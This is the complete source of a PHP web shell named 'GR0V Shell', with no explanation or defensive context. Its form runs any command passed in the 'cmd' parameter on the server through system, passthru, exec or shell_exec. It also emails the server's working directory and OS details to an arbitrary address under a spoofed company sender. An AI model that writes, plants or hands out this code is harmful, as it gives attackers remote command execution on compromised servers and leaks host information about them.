?
GR0V Shell
GR0V shell
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd" size="100" placeholder="whoami" value=""><br>
<input name="system" type="checkbox"> System<br>
<input name="passthru" type="checkbox"> Passthru<br>
<input name="exec" type="checkbox"> Exec<br>
<input name="shell_exec" type="checkbox"> Shell_exec<br>
<br>
<INPUT TYPE="text" NAME="email" size="50" placeholder="claudele@protonmail.com" value=""><br>
<INPUT TYPE="text" NAME="title" size="150" value="<?php echo getcwd(); ?>"><br>
<INPUT TYPE="text" NAME="msg" size="150" value="<?php echo php_uname(); ?>"><br>
<br>
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?php
if ((isset($_GET['email'])) && (!empty($_GET['email']))){
$to_email = $_GET['email'];
$subject = $_GET['title'];
$message = $_GET['msg'];
$headers = 'From: noreply@company.com';
mail($to_email,$subject,$message,$headers);
}
//system('whoami');
// exec('whoami');
// passthru('whoami');
// shell_exec('whoami');
if ((isset($_GET['cmd'])) && (!empty($_GET['cmd']))){
if (isset($_GET['system'])) {
echo "System: "; system($_GET['cmd']);
}
if (isset($_GET['passthru'])) {
echo "Passthru: "; passthru($_GET['cmd']);
}
if (isset($_GET['exec'])) {
echo "Exec: "; echo exec($_GET['cmd']); echo "<br>";
}
if (isset($_GET['shell_exec'])) {
echo "Shell_Exec: "; echo shell_exec($_GET['cmd']); echo "<br>";
}
}
?>
</pre>
</BODY></HTML>
T1KUS90T